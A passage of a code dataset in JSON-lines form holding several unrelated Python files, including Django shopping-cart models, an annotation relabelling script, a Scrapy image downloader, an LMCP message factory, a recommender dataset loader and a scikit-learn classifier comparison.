%s\" % (str(self.customer), str(self.offer))\n\n @property\n def should_be_processed_today(self):\n if self.is_paused:\n return False\n today = date.today()\n try:\n if self.last_process_date < today:\n if self.ends_on:\n if self.ends_on < today:\n return False\n if self.send_every_n_days:\n diff = today - self.last_process_date\n return diff.days >= self.send_every_n_days\n if self.send_on_x_day and self.last_process_date != today:\n return today.day == self.send_on_x_day\n if self.is_totm and today.day == self.TOTM_DAY and self.last_process_date != today:\n return True\n if self.is_trotm and today.day == self.TROTM_DAY and self.last_process_date != today:\n return True\n if self.is_chotm and today.day == self.CHOTM_DAY and self.last_process_date != today:\n return True\n except TypeError: # last process date is None\n return True\n return False\n\n def create_cart(self):\n cart = Cart(customer=self.customer)\n cart.save()\n offer = CartedOffer(cart=cart, offer=self.offer, quantity=self.quantity)\n offer.save()\n return cart, offer\n\n\nclass CartedOffer(TimeStamped):\n\n cart = models.ForeignKey(Cart, related_name='offers')\n offer = models.ForeignKey('products.Offer', related_name='carts')\n deal = models.ForeignKey('products.Deal')\n deal_availability = models.IntegerField(blank=True)\n offer_availability = models.IntegerField(blank=True)\n quantity = models.PositiveIntegerField()\n\n class Meta:\n verbose_name = 'Carted Offer'\n unique_together = (\n ('cart', 'offer'),\n )\n\n def __init__(self, *args, **kwargs):\n super(CartedOffer, self).__init__(*args, **kwargs)\n\n def __str__(self):\n return \"%s : %s\" % (str(self.cart), str(self.offer))\n\n def save(self, *args, **kwargs):\n self.deal_availability = self.deal.available_for_sale\n self.offer_availability = self.offer.available_for_sale\n try:\n old = CartedOffer.objects.get(pk=self.pk)\n self._diff = self.quantity - old.quantity\n except (CartedOffer.DoesNotExist, AttributeError):\n self._diff = self.quantity\n try:\n super(CartedOffer, self).save(*args, **kwargs)\n except IntegrityError:\n co = CartedOffer.objects.get(cart=self.cart, offer=self.offer)\n print(co.__dict__)\n self.quantity = int(self.quantity) + int(co.quantity)\n if self.quantity < 0:\n self.quantity = 0\n self.pk = co.pk\n kwargs['force_update'] = True\n super(CartedOffer, self).save(*args, **kwargs)\n\n @property\n def line_total(self):\n return int(self.quantity) * float(self.offer.price)\n\n\n# special object wrapper for check outs\nclass Checkout(object):\n\n def __init__(self, initial=None):\n self.__dict__['_data'] = {}\n if initial:\n self.update(initial)\n\n def __getattr__(self, name):\n return self._data.get(name, None)\n\n def __setattr__(self, name, value):\n self.__dict__['_data'][name] = value\n\n def update(self, other):\n for k in other:\n self.__setattr__(k, other[k])\n\n def to_dict(self):\n return self._data\n","sub_path":"api_apps/sales/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":10712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"84837315","text":"def a(*args):\n print(args)\n print(type(args))\n\n\na(1, 2, 3, 4)\ntup1 = 1, 3, 5, 7, 9\na(*tup1)\nset1 = {1, 3, 6}\na(*set1)\nstr1 = \"hello\"\na(*str1)\na(*str1, *tup1)\ndict01 = {\"name\": 10, \"age\": 20}\na(*dict01) # 传一个拆包的字典经过*args参数之后只会把key留下变为元组\n\n\n# 
经过*args参都变为元组的类型tuple\n\n\n","sub_path":"boke/元组参数02.py","file_name":"元组参数02.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"570698719","text":"import json\nimport config\nimport os\nimport pprint\nfrom tqdm import tqdm\nimport cv2\npp = pprint.PrettyPrinter(indent=4)\n\njson_data = open(config.kit_help_annotation_temp).read()\nhelp_dataset = json.loads(json_data)\n\n\nmap_1 = {\n 'get cloth from technician on ladder and put on the table': 'get_from_technician_and_put_on_the_table cloth on_ladder',\n 'get cloth from technician under diverter and put on the table': 'get_from_technician_and_put_on_the_table cloth under_diverter',\n 'get spray-bottle from technician near guard-support and put on the table': 'get_from_technician_and_put_on_the_table spray_bottle guard_support',\n 'get spray-bottle from technician on ladder and put on the table': 'get_from_technician_and_put_on_the_table spray_bottle on_ladder',\n 'get spray-bottle from technician under diverter and put on the table': 'get_from_technician_and_put_on_the_table spray_bottle under_diverter',\n 'get torch from technician near guard-support and put on the table': 'get_from_technician_and_put_on_the_table torch guard_support',\n 'get torch from technician under diverter and put on the table': 'get_from_technician_and_put_on_the_table torch under_diverter',\n 'get spray-bottle from technician near guard and put on the table':'get_from_technician_and_put_on_the_table spray_bottle guard_support',\n 'get torch from technician on ladder and put on the table':'get_from_technician_and_put_on_the_table torch on_ladder',\n 'grasp guard and put on diverter': 'grasp_and_put_on_diverter guard at_guard_support',\n 'remove guard and put down': 'remove_and_put_down guard under_diverter'\n\n}\n\nmap_2 = {\n 'give cloth to the technician sil' : 'give_to_technician cloth sil',\n 'give cloth to the technician under_diverter' : 'give_to_technician cloth under_diverter',\n 'give spray-bottle to the technician on_ladder' : 'give_to_technician spray_bottle on_ladder',\n 'give spray-bottle to the technician sil' : 'give_to_technician spray_bottle sil',\n 'give spray-bottle to the technician under_diverter' : 'give_to_technician spray_bottle under_diverter',\n 'give torch to the technician on_ladder' : 'give_to_technician torch on_ladder',\n 'give torch to the technician sil' : 'give_to_technician torch sil',\n 'give torch to the technician under_diverter' : 'give_to_technician torch under_diverter',\n\n}\n\ndef clean_label(label):\n label = label.split(':')\n if label[0] in map_1:\n label = map_1[label[0]]\n else:\n label = label[0] + ':' + label[1]\n return label\n\ndef clean_label_2(label, dat, fl):\n label = label.split(':')\n if len(label) > 1:\n if 'under diverter' in label[1]:\n label = label[0] + ' under_diverter'\n elif 'on ladder' in label[1]:\n label = label[0] + ' on_ladder'\n elif 'at guard-support' in label[1]:\n label = label[0] + ' at_guard_support'\n else:\n pp.pprint(fl)\n # pp.pprint(dat)\n print(label)\n label = label[0] + ' sil'\n else:\n label = label[0]\n return label\n\ndef clean_label_3(label):\n if label in map_2:\n label = map_2[label]\n return label\n\nlabels = []\nlabel_collection = []\n# pp.pprint(help_dataset['recording_03-15-2019_16-14-27.267_cam6.avi'])\n\nfor fl in help_dataset:\n label_list = []\n segment_start_to_entry = {}\n # print('NEW')\n # pp.pprint(help_dataset[fl])\n\n # translation next help into previous sil help\n 
pp.pprint(help_dataset[fl])\n\n for idx in range(len(help_dataset[fl])-1): \n entry = help_dataset[fl][idx]\n if entry['label'].split(':')[1] == 'sil':\n if help_dataset[fl][idx+1]['label'].split(':')[0] != entry['label'].split(':')[0]:\n entry['label']=help_dataset[fl][idx+1]['label']\n\n pp.pprint(help_dataset[fl])\n\n #map start time to entry\n for idx in range(len(help_dataset[fl])): \n entry = help_dataset[fl][idx]\n segment = entry['milliseconds']\n segment_start_to_entry[segment[0]] = entry\n\n #order entry by start frame\n new_entry_order = []\n while len(segment_start_to_entry) > 0:\n min_key = min(segment_start_to_entry.keys())\n new_entry_order.append(segment_start_to_entry[min_key])\n del segment_start_to_entry[min_key]\n help_dataset[fl] = new_entry_order\n\n #cut overlapping entry by start frame\n new_entry_order_2 = []\n for idx in range(len(new_entry_order) - 1):\n entry = new_entry_order[idx]\n segment = entry['milliseconds']\n next_segment = help_dataset[fl][idx+1]['milliseconds'][0]\n if segment[1] > next_segment:\n segment[1] = next_segment- 1\n new_entry_order[idx]['milliseconds'] = segment\n new_entry_order_2.append(new_entry_order[idx])\n\n # first label clean\n for idx in range(len(help_dataset[fl])):\n entry = help_dataset[fl][idx]\n label = entry['label']\n if label.split(':')[0] not in label_collection:\n label_collection.append(label.split(':')[0])\n label = clean_label(label)\n help_dataset[fl][idx]['label'] = label\n\n # join cleaned label\n new_entry_order = []\n idx = 0\n while idx < len(help_dataset[fl]) - 1:\n entry = help_dataset[fl][idx]\n while help_dataset[fl][idx +1]['label'] == entry['label']:\n entry['milliseconds'][1] = help_dataset[fl][idx +1]['milliseconds'][1]\n del help_dataset[fl][idx +1]\n if (idx+1) > len(help_dataset[fl]) - 1:\n break\n new_entry_order.append(entry)\n idx += 1\n\n if help_dataset[fl][-1]['label'] != new_entry_order[-1]['label']:\n new_entry_order.append(help_dataset[fl][-1])\n\n help_dataset[fl] = new_entry_order\n\n # join uncleaned label\n new_entry_order = []\n idx = 0\n while idx < len(help_dataset[fl]) - 1:\n entry = help_dataset[fl][idx]\n while help_dataset[fl][idx +1]['label'].split(':')[0] == entry['label'].split(':')[0]:\n entry['label'] += (' ') + help_dataset[fl][idx +1]['label'].split(':')[1]\n entry['milliseconds'][1] = help_dataset[fl][idx +1]['milliseconds'][1]\n del help_dataset[fl][idx +1]\n if (idx+1) > len(help_dataset[fl]) - 1:\n break\n new_entry_order.append(entry)\n idx += 1\n\n if help_dataset[fl][-1]['label'] != new_entry_order[-1]['label']:\n new_entry_order.append(help_dataset[fl][-1])\n\n help_dataset[fl] = new_entry_order\n\n # search location for uncleaned label\n # and create list of all labels\n for idx in range(len(help_dataset[fl])):\n entry = help_dataset[fl][idx]\n label = entry['label']\n label = clean_label_2(label, help_dataset[fl], fl)\n label = clean_label_3(label)\n help_dataset[fl][idx]['label'] = label\n if label not in labels:\n labels.append(label)\n \nwith open(config.kit_help_annotation, 'w') as outfile:\n json.dump(help_dataset, outfile)\n\nlabel_collection.sort()\npp.pprint(label_collection)\nlabels.sort()\nprint('labels')\npp.pprint(labels)\n\n\n\n\n","sub_path":"script_help_remap.py","file_name":"script_help_remap.py","file_ext":"py","file_size_in_byte":7105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"452476062","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your 
pipeline to the ITEM_PIPELINES setting\n# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html\n\nimport os\nimport ssl\n\nfrom urllib import request\n\nclass NocarPipeline(object):\n def __init__(self):\n ssl._create_default_https_context = ssl._create_unverified_context\n #os.path.join(os.path.dirname(os.path.dirname(__file__)),'images')\n self.path = os.path.join(os.path.dirname(os.path.dirname(__file__)), 'dowload_images')\n if not os.path.exists(self.path):\n os.mkdir(self.path)\n else:\n print(\"已经存在文件夹\")\n\n def process_item(self, item, spider):\n catgory_title = \"bbb\"\n urls_list = item['urls_list']\n #创建一个当前分类的文件夹\n title_path = os.path.join(self.path,catgory_title)\n if not os.path.exists(title_path):\n os.mkdir(title_path)\n\n #文件夹创建完毕后,就将每一个图片放入到对应的文件夹下\n for url in urls_list:\n print(url)\n image_name = url.split(\"/\")[-1]\n request.urlretrieve(url,os.path.join(title_path,image_name))\n return item\n","sub_path":"nocar/nocar/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"582646914","text":"import struct\nimport LMCPObject\nimport xml.dom.minidom\n\nimport afrl.cmasi\nimport afrl.cmasi.perceive\n\n\nHEADER_SIZE = 8 # don't modify this\nCHECKSUM_SIZE = 4 # don't modify this\nLMCP_CONTROL_STR = 0x4c4d4350\n\nclass LMCPFactory:\n def __init__(self):\n self.series_enums = {}\n from afrl.cmasi import SeriesEnum\n self.addSeries(SeriesEnum)\n from afrl.cmasi.perceive import SeriesEnum\n self.addSeries(SeriesEnum)\n\n\n def addSeries(self, series):\n if not series.SERIES_NAME_ID in self.series_enums.keys():\n self.series_enums[series.SERIES_NAME_ID] = series\n\n def getObject(self, buffer):\n if len(buffer) < HEADER_SIZE:\n print(\"getObject() : buffer too small for message\")\n return None\n type = getLMCPType(buffer)\n series = getLMCPSeries(buffer)\n version = getLMCPVersion(buffer)\n obj = self.createObject(series, version, type)\n if obj != None:\n obj.unpack(buffer, HEADER_SIZE + 15)\n return obj\n\n def getObjFromStream(self, fileobj):\n \"\"\"\n reads an LMCP object from a file source, such as a socket (or file on the disk)\n \"\"\"\n header = fileobj.read(HEADER_SIZE)\n msgSize = getSize(header)\n msgBody = fileobj.read(msgSize + CHECKSUM_SIZE)\n if validate(header + msgBody) != True:\n print(\"LMCPFactory : bad checksum. 
\")\n return None\n return self.getObject(header + msgBody)\n\n def createObject(self, series_id, version, object_type):\n if series_id in self.series_enums.keys():\n series_enum = self.series_enums[series_id]\n\n if series_enum.SERIES_VERSION == version:\n return series_enum.SeriesEnum().getInstance(object_type)\n\n\n return None\n\n def createObjectByName(self, name):\n \"\"\"\n Returns a new LMCP object based on its name\n \"\"\"\n return None\n\n def unpackFromXMLNode(self, domNode):\n \"\"\"\n Reads in an XML node, unpacks objects, adds them to a list and\n returns the list\n \"\"\"\n objs = []\n for e in domNode.childNodes:\n if e.nodeType == xml.dom.Node.ELEMENT_NODE:\n obj = self.createObjectByName(e.localName)\n if obj != None:\n obj.unpackFromXMLNode(e, self)\n objs.append(obj)\n return objs\n\n def createObjectFromNode(self, xmlNode):\n return None\n\n def unpackFromXMLString(self, xmlStr):\n \"\"\"\n Reads in an XML string, unpacks objects, adds them to a list and\n returns the list\n \"\"\"\n doc = xml.dom.minidom.parseString(xmlStr)\n return self.unpackFromXMLNode(doc.documentElement)\n\n def unpackFromXMLFile(self, file):\n \"\"\"\n Reads in an XML document, unpacks objects, adds them to a list and\n returns the list\n \"\"\"\n doc = xml.dom.minidom.parse(file)\n return self.unpackFromXMLNode(doc.documentElement)\n\ninternalFactory = LMCPFactory()\n\ndef packMessage(lmcpObject, calcChecksum):\n \"\"\"\n packs a buffer (string) object and returns it\n \"\"\"\n\n if lmcpObject == None:\n return None\n # pack the header\n hdr_buffer = []\n obj_buffer = []\n cks_buffer = []\n total_buffer = []\n hdr_buffer.append(struct.pack(\">I\", LMCP_CONTROL_STR))\n obj_tmp = lmcpObject.pack()\n obj_buffer.append(struct.pack(\">B\", lmcpObject != None))\n obj_buffer.append(struct.pack(\">q\", lmcpObject.SERIES_NAME_ID))\n obj_buffer.append(struct.pack(\">I\", lmcpObject.LMCP_TYPE))\n obj_buffer.append(struct.pack(\">H\", lmcpObject.SERIES_VERSION))\n obj_buffer.append(obj_tmp)\n hdr_buffer.append(struct.pack(\">I\", len(\"\".join(obj_buffer))))\n total_buffer.extend(hdr_buffer)\n total_buffer.extend(obj_buffer)\n\n #pack the checksum\n if calcChecksum:\n total_buffer.append(struct.pack(\">I\", calculateChecksum(\"\".join(total_buffer), 0)))\n else:\n total_buffer.append(struct.pack(\">I\", 0))\n\n return \"\".join(total_buffer)\n\ndef getSize(buffer):\n return struct.unpack_from(\">I\", buffer, 4)[0]\n\ndef getLMCPValidObject(buffer):\n return struct.unpack_from(\">B\", buffer, 8)[0]\n\ndef getLMCPSeries(buffer):\n return struct.unpack_from(\">q\", buffer, 9)[0]\n\ndef getLMCPType(buffer):\n return struct.unpack_from(\">I\", buffer, 17)[0]\n\ndef getLMCPVersion(buffer):\n return struct.unpack_from(\">H\", buffer, 21)[0]\n\ndef calculateChecksum(buffer, offset):\n \"\"\"\n Calculates the checksum. This should be called after pack().\n The checksum sums all bytes in the packet between 0 and\n buf.limit() - CHECKSUM_SIZE.\n \"\"\"\n sum = 0\n for x in range(len(buffer)-offset):\n sum += struct.unpack_from(\"b\", buffer, x)[0] & 0xFF\n return sum\n\ndef validate(buffer):\n \"\"\"\n checks the bytebuffer's checksum value against the calculated checksum\n returns true if the calculated and stored values match, or if the buffer value is\n zero (indicating that checksum was not calculated. 
This method rewinds the buffer and\n returns it to LIMIT - 4 bytes (start position of checksum)\n \"\"\"\n cs = struct.unpack_from(\">I\", buffer, len(buffer)-5)[0]\n if cs == 0:\n return True\n else:\n return cs == calculateChecksum(buffer, 5)\n\n\n","sub_path":"concept/auto_generated/lmcp/LMCPFactory.py","file_name":"LMCPFactory.py","file_ext":"py","file_size_in_byte":5311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"358594312","text":"from __future__ import absolute_import, division, print_function\n\nimport numpy as np\n\n\nclass DataFrame(object):\n\n\n def __init__(self,\n path_to_input_file,\n number_of_output_neurons\n ):\n\n\n array = np.load(path_to_input_file)\n\n\n self._data = array[:, number_of_output_neurons:-1]\n self._event_weights = array[:, -1]\n\n if number_of_output_neurons == 1:\n self._labels = array[:, 0]\n else:\n self._labels = array[:, :number_of_output_neurons]\n\n\n self._number_of_events = self._data.shape[0]\n self._number_of_variables = self._data.shape[1]\n\n\n\n\n def get_data_labels_event_weights_as_batches(self,\n batch_size,\n sort_events_randomly,\n include_smaller_last_batch\n ):\n\n\n if sort_events_randomly:\n permutation = np.random.permutation(self._number_of_events)\n\n else:\n permutation = np.array(range(self._number_of_events))\n\n\n current_index = 0\n while (current_index + batch_size <= self._number_of_events):\n batch_indices = permutation[current_index : current_index+batch_size]\n\n current_index += batch_size\n\n yield (self._data [batch_indices],\n self._labels [batch_indices],\n self._event_weights[batch_indices]\n )\n\n\n if include_smaller_last_batch:\n if current_index < self._number_of_events:\n batch_indices = permutation[current_index :]\n \n yield (self._data [batch_indices],\n self._labels [batch_indices],\n self._event_weights[batch_indices]\n )\n\n\n\n\n def get_data(self):\n\n\n return self._data\n\n\n\n\n def get_data_labels_event_weights(self):\n\n\n return self._data, self._labels, self._event_weights\n\n\n\n\n def get_labels_event_weights(self):\n\n\n return self._labels, self._event_weights\n\n\n\n\n def get_number_of_variables(self):\n\n\n return self._number_of_variables\n","sub_path":"NNFlow/data_frame/data_frame.py","file_name":"data_frame.py","file_ext":"py","file_size_in_byte":2306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"601919653","text":"from collections import defaultdict\nimport numpy as np\nimport tensorflow as tf\nfrom .download_data import prepare_data\nfrom ..utils.sampling import NegativeSampling\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\nclass DatasetPure:\n def __init__(self, load_builtin_data=\"ml-1m\", par_path=None):\n self.train_user = defaultdict(dict)\n self.train_item = defaultdict(dict)\n self.user2id = dict()\n self.item2id = dict()\n self.id2user = dict()\n self.id2item = dict()\n self.train_user_indices = list()\n self.train_item_indices = list()\n self.train_labels = list()\n self.test_user_indices = list()\n self.test_item_indices = list()\n self.test_labels = list()\n if load_builtin_data == \"ml-1m\":\n prepare_data(par_path, feat=False)\n\n def build_dataset(self, data_path=\"../ml-1m/ratings.dat\", shuffle=True, length=\"all\", sep=\",\",\n user_col=None, item_col=None, label_col=None, split_mode=\"train_test\", threshold=0,\n train_frac=0.8, convert_implicit=False, build_negative=False, build_tf_dataset=False,\n k=1, batch_size=256, seed=42, 
num_neg=None, lower_upper_bound=None):\n np.random.seed(seed)\n self.batch_size = batch_size\n self.lower_upper_bound = lower_upper_bound\n if isinstance(num_neg, int) and num_neg > 0:\n self.num_neg = num_neg\n if not np.all([user_col, item_col, label_col]):\n self.user_col = 0\n self.item_col = 1\n self.label_col = 2\n\n with open(data_path, 'r') as f:\n loaded_data = f.readlines()\n if shuffle:\n loaded_data = np.random.permutation(loaded_data)\n if length == \"all\":\n length = len(loaded_data)\n if split_mode == \"train_test\":\n self.train_test_split(loaded_data, length, sep, train_frac, convert_implicit,\n build_negative, build_tf_dataset, threshold, num_neg)\n elif split_mode == \"leave_k_out\":\n self.leave_k_out_split(k, loaded_data, length, sep, convert_implicit, shuffle,\n build_negative, threshold, num_neg)\n else:\n raise ValueError(\"split_mode must be either 'train_test' or 'leave_k_out'\")\n\n def train_test_split(self, loaded_data, length, sep=\",\", train_frac=0.8, convert_implicit=False,\n build_negative=False, build_tf_dataset=False, threshold=0, num_neg=None):\n index_user = 0\n index_item = 0\n for i, line in enumerate(loaded_data[:length]):\n user = line.split(sep)[self.user_col]\n item = line.split(sep)[self.item_col]\n label = line.split(sep)[self.label_col]\n if convert_implicit and int(label) > threshold:\n label = 1\n try:\n user_id = self.user2id[user]\n except KeyError:\n user_id = index_user\n self.user2id[user] = index_user\n index_user += 1\n try:\n item_id = self.item2id[item]\n except KeyError:\n item_id = index_item\n self.item2id[item] = index_item\n index_item += 1\n\n if i <= int(train_frac * length):\n self.train_user_indices.append(user_id)\n self.train_item_indices.append(item_id)\n self.train_labels.append(float(label))\n self.train_user[user_id].update(dict(zip([item_id], [float(label)])))\n self.train_item[item_id].update(dict(zip([user_id], [float(label)])))\n else:\n self.test_user_indices.append(user_id)\n self.test_item_indices.append(item_id)\n self.test_labels.append(float(label))\n\n self.train_user_indices = np.array(self.train_user_indices)\n self.train_item_indices = np.array(self.train_item_indices)\n self.train_labels = np.array(self.train_labels)\n\n print(\"testset size before: \", len(self.test_labels))\n test_all = np.concatenate([np.expand_dims(self.test_user_indices, 1),\n np.expand_dims(self.test_item_indices, 1),\n np.expand_dims(self.test_labels, 1)], axis=1)\n test_safe = test_all[(test_all[:, 0] < self.n_users) & (test_all[:, 1] < self.n_items)]\n test_danger = test_all[(test_all[:, 0] >= self.n_users) & (test_all[:, 1] >= self.n_items)]\n self.test_user_indices = test_safe[:, 0].astype(int)\n self.test_item_indices = test_safe[:, 1].astype(int)\n self.test_labels = test_safe[:, 2]\n\n if build_negative:\n self.build_trainset_implicit(num_neg)\n self.build_testset_implicit(num_neg)\n\n if build_tf_dataset:\n self.load_tf_trainset()\n self.load_tf_testset()\n\n print(\"testset size after: \", len(self.test_labels))\n return self\n\n def leave_k_out_split(self, k, loaded_data, length, sep=\",\", convert_implicit=False,\n shuffle=True, build_negative=False, threshold=0, num_neg=None):\n \"\"\"\n leave-last-k-out-split : split k test sample from each user\n :return: dataset\n \"\"\"\n user_indices = list()\n item_indices = list()\n labels = list()\n train_user_indices = list()\n train_item_indices = list()\n train_labels = list()\n test_user_indices = list()\n test_item_indices = list()\n test_labels = list()\n user2id = 
dict()\n item2id = dict()\n index_user = 0\n index_item = 0\n for i, line in enumerate(loaded_data[:length]):\n user = line.split(sep)[self.user_col]\n item = line.split(sep)[self.item_col]\n label = line.split(sep)[self.label_col]\n if convert_implicit and int(label) > threshold:\n label = 1\n try:\n user_id = user2id[user]\n except KeyError:\n user_id = index_user\n user2id[user] = index_user\n index_user += 1\n try:\n item_id = item2id[item]\n except KeyError:\n item_id = index_item\n item2id[item] = index_item\n index_item += 1\n\n user_indices.append(user_id)\n item_indices.append(item_id)\n labels.append(float(label))\n\n user_indices = np.array(user_indices)\n item_indices = np.array(item_indices)\n labels = np.array(labels)\n\n users, user_position, user_counts = np.unique(user_indices,\n return_inverse=True,\n return_counts=True)\n user_split_indices = np.split(np.argsort(user_position, kind=\"mergesort\"),\n np.cumsum(user_counts)[:-1])\n\n for u in users:\n user_length = len(user_split_indices[u])\n if user_length <= 1 or k == 0:\n train_indices = user_split_indices[u]\n test_indices = []\n elif user_length <= k:\n p = 1\n train_indices = user_split_indices[u][:-p]\n test_indices = user_split_indices[u][-p:]\n else:\n p = k\n train_indices = user_split_indices[u][:-p]\n test_indices = user_split_indices[u][-p:]\n\n train_user_indices.extend(user_indices[train_indices])\n train_item_indices.extend(item_indices[train_indices])\n train_labels.extend(labels[train_indices])\n\n test_user_indices.extend(user_indices[test_indices])\n test_item_indices.extend(item_indices[test_indices])\n test_labels.extend(labels[test_indices])\n\n print(\"testset size before: \", len(test_item_indices))\n train_item_pool = np.unique(train_item_indices)\n mask = np.isin(test_item_indices, train_item_pool) # remove items in test data that are not in train data\n test_user_indices = np.array(test_user_indices)[mask]\n test_item_indices = np.array(test_item_indices)[mask]\n test_labels = np.array(test_labels)[mask]\n print(\"testset size after: \", len(test_item_indices))\n\n self.user2id = dict(zip(set(train_user_indices), np.arange(len(set(train_user_indices)))))\n self.item2id = dict(zip(set(train_item_indices), np.arange(len(set(train_item_indices)))))\n for user, item, label in zip(train_user_indices, train_item_indices, train_labels):\n self.train_user_indices.append(self.user2id[user])\n self.train_item_indices.append(self.item2id[item])\n self.train_labels.append(label)\n\n for test_u, test_i, test_l in zip(test_user_indices, test_item_indices, test_labels):\n self.test_user_indices.append(self.user2id[test_u])\n self.test_item_indices.append(self.item2id[test_i])\n self.test_labels.append(test_l)\n\n if shuffle:\n random_mask = np.random.choice(len(self.train_user_indices), len(self.train_user_indices), replace=False)\n self.train_user_indices = np.array(self.train_user_indices)[random_mask]\n self.train_item_indices = np.array(self.train_item_indices)[random_mask]\n self.train_labels = np.array(self.train_labels)[random_mask]\n else:\n self.train_user_indices = np.array(self.train_user_indices)\n self.train_item_indices = np.array(self.train_item_indices)\n self.train_labels = np.array(self.train_labels)\n\n self.test_user_indices = np.array(self.test_user_indices)\n self.test_item_indices = np.array(self.test_item_indices)\n self.test_labels = np.array(self.test_labels)\n\n for u, i, r in zip(self.train_user_indices, self.train_item_indices, self.train_labels):\n 
self.train_user[u].update(dict(zip([i], [r])))\n self.train_item[i].update(dict(zip([u], [r])))\n\n if build_negative:\n self.build_trainset_implicit(num_neg)\n self.build_testset_implicit(num_neg)\n\n return self\n\n def build_trainset_implicit(self, num_neg):\n neg = NegativeSampling(self, num_neg, self.batch_size, replacement_sampling=True)\n self.train_user_implicit, \\\n self.train_item_implicit, \\\n self.train_label_implicit = neg(mode=\"train\")\n\n def build_testset_implicit(self, num_neg):\n neg = NegativeSampling(self, num_neg, self.batch_size, replacement_sampling=True)\n self.test_user_implicit, \\\n self.test_item_implicit, \\\n self.test_label_implicit = neg(mode=\"test\")\n\n def load_tf_trainset(self):\n trainset_tf = tf.data.Dataset.from_tensor_slices({'user': self.train_user_indices,\n 'item': self.train_item_indices,\n 'label': self.train_labels})\n self.trainset_tf = trainset_tf.shuffle(len(self.train_labels))\n return self\n\n def load_tf_testset(self):\n testset_tf = tf.data.Dataset.from_tensor_slices({'user': self.test_user_indices,\n 'item': self.test_item_indices,\n 'label': self.test_labels})\n self.testset_tf = testset_tf.filter(lambda x: (x['user'] < self.n_users) & (x['item'] < self.n_items))\n return self\n\n def ratings(self):\n for user, r in self.train_user:\n for item, rating in r.items():\n yield user, item, rating\n\n @property\n def get_id2user(self):\n return {idx: user for user, idx in self.user2id.items()}\n\n @property\n def global_mean(self):\n return np.mean(self.train_labels)\n\n @property\n def n_users(self):\n return len(self.train_user)\n\n @property\n def n_items(self):\n return len(self.train_item)\n\n","sub_path":"libreco/dataset/DatasetPure.py","file_name":"DatasetPure.py","file_ext":"py","file_size_in_byte":12107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"331961101","text":"# Ejecuta los modelos con parámetros por defecto sobre unos datos que\n# admite como parámetro. 
Calcula diferentes scores y los escribe en un\n# csv\nSEED=185\n\nimport numpy as np\nimport os\n\nfrom sklearn.model_selection import KFold\nfrom sklearn import tree\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.svm import SVC\nfrom sklearn.dummy import DummyClassifier\nfrom sklearn.metrics import confusion_matrix\n\n# Para calcular la matriz de confusión usando validación cruzada sumamos las matrices obtenidas en las distintas particiones\n# https://stats.stackexchange.com/questions/147175/how-is-the-confusion-matrix-reported-from-k-fold-cross-validation\n# https://stackoverflow.com/questions/40057049/using-confusion-matrix-as-scoring-metric-in-cross-validation-in-scikit-learn\ndef KFoldConfusionMatrix(model, data, target):\n conf_matrix_list_of_arrays = []\n kf = KFold(n_splits=5, shuffle=True, random_state=SEED)\n for train_index, test_index in kf.split(data):\n X_train, X_test = data[train_index], data[test_index]\n y_train, y_test = target[train_index], target[test_index]\n model.fit(X_train, y_train)\n conf_matrix = confusion_matrix(y_test, model.predict(X_test))\n conf_matrix_list_of_arrays.append(conf_matrix)\n return np.sum(conf_matrix_list_of_arrays, axis=0)\n\ndef defaultModelsRun(x, y, name):\n outfilename='results/proc_'+name+'.csv'\n TMPfile='TMP.csv'\n \n table = np.empty((9,10))\n \n # Models:\n dummy=DummyClassifier(strategy='constant',constant=1)\n dt=tree.DecisionTreeClassifier(random_state=SEED)\n gnb=GaussianNB()\n svc=SVC(random_state=SEED)\n rf=RandomForestClassifier(n_jobs=4, random_state=SEED)\n knn=KNeighborsClassifier() # K=5 por defecto\n rn=MLPClassifier(max_iter=500,random_state=SEED) # Max_iter=500 porque recibí warning de convergencia\n models = [dummy, dt, gnb, svc, rf, knn, rn]\n\n for i,m in enumerate(models):\n conf_mat = KFoldConfusionMatrix(m,x,y)\n \"\"\" La matriz de confusión aparece como\n Pred: 0 1\n (Benigno) Real=0: TN FP\n (Maligno) Real=1: FN TP\n \"\"\"\n # Quiero ponerla: TP, TN, FP, FN\n table[i,0:4]=[conf_mat[1,1],conf_mat[0,0],conf_mat[0,1],conf_mat[1,0]]\n\n # Acc\n table[:7,4]=(table[:7,0]+table[:7,1])/(table[:7,0]+table[:7,1]+table[:7,2]+table[:7,3])\n # TPR\n table[:7,5]=table[:7,0]/(table[:7,0]+table[:7,3])\n # FPR\n table[:7,6]=table[:7,2]/(table[:7,1]+table[:7,2])\n # AUC\n table[:7,7]=(1+table[:7,5]-table[:7,6])/2\n # F1-score\n table[:7,8]=2*table[:7,0]/(2*table[:7,0]+table[:7,2]+table[:7,3])\n # G-measure\n table[:7,9]=table[:7,0]/np.sqrt((table[:7,0]+table[:7,2])*(table[:7,0]+table[:7,3]))\n\n # Máximo\n table[7]=np.amax(table[1:7],axis=0)\n # Media\n table[8]=np.mean(table[1:7],axis=0)\n\n np.savetxt(TMPfile, table, delimiter=',', fmt=['%1.1f']*4+['%1.4f']*6)\n\n string=',\"TP\",\"TN\",\"FP\",\"FN\",\"Acc\",\"TPR\",\"FPR\",\"AUC\",\"F1-score\",\"G-measure\"\\n'\n rownames= [\"Dummy\",\"DecisionTree\",\"GaussianNB\",\"SupportVectorM\",\"RandomForest\",\"KNN\",\"NeuralNetwork\",\"Máximo\",\"Media\"]\n with open(TMPfile) as tmp:\n i=0\n for line in tmp:\n string+=rownames[i]+','+line.replace('.0,',',')\n i+=1\n os.remove(TMPfile)\n with open(outfilename,\"w+\") as outf:\n 